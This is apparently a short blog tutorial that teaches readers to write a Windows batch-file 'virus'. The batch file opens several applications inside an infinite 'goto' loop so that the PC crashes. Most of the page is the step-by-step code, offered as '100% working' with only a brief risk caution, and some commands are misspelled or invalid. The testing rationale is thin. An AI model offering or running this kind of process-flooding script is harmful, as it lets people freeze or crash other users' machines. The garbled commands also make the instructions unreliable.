Make your own Virus using Batch Script

The first question is what is Batch File ?

  A  batch file is a text file that contains a sequence of commands for a computer operating system. It's called a batch file because it contains a bundles/packages of  commands line in a single file. Usually Batch file is used to operate the system as we required.  The batch file is execute by command prompt.
Many viruses are made up of Batch Files. Also you can make your own virus to test the working of your antivirus against viruses .
  
To make a virus which can crash your system (PC) you need to have Notepad pre-installed in your PC . Follow the same procedure to make a visus that can crash PC :- 
  Open the Notepad and write the same code :- 

1. Type - @echo off
By use of echo off command , the command prompt window doesn't appear on screen.

2. Then type - :x
By use of this command , you can execute to your batch file.

3. Then type the applications names which you want to run by batch file . You can type any application name or any setting name after typing start and giving one space.Type more than one application name to make virus stronger. Next application name with start should be typed in next line of batch file.
start notepad
start write
stat cmd
start explorer
start camera
start winword
start control panel
start recycle bin
start network




4. Then Type - goto x //infinite loop
This command will run your whole Batch file for infinite times. 

5. Now save the file by clicking on save as and selecting file type as All Files . Change file extension to .bat to make the file as batch file. 





Now you are able to run this virus/batch fiby double clicking on saved batch file.




Congratulations you've successfully created your own virus. This method is 100% working. Now play with this virus and test your system . 
Caution :- "Run this Batch file/virus on your own risk. " I highly recommend you to don't run this file on your own PC . It can harm your system. By running this file your system will definitely going to crash because it'll run all command application for infinite times.

Stay tuned for more technical stuff. And comment down for any queries.

                                       ****Thankyou****






Comments

Popular posts from this blog

[ROOT] Xiomi Redmi Note Prime ( HM note 1S )Indian Model

{TWRP} Custom Recovery for Xiomi Redmi Note Prime [ HM note1S ] Indian Model. How to Install ?

Change Boot Animation Of Any Android Device { Rooted Users }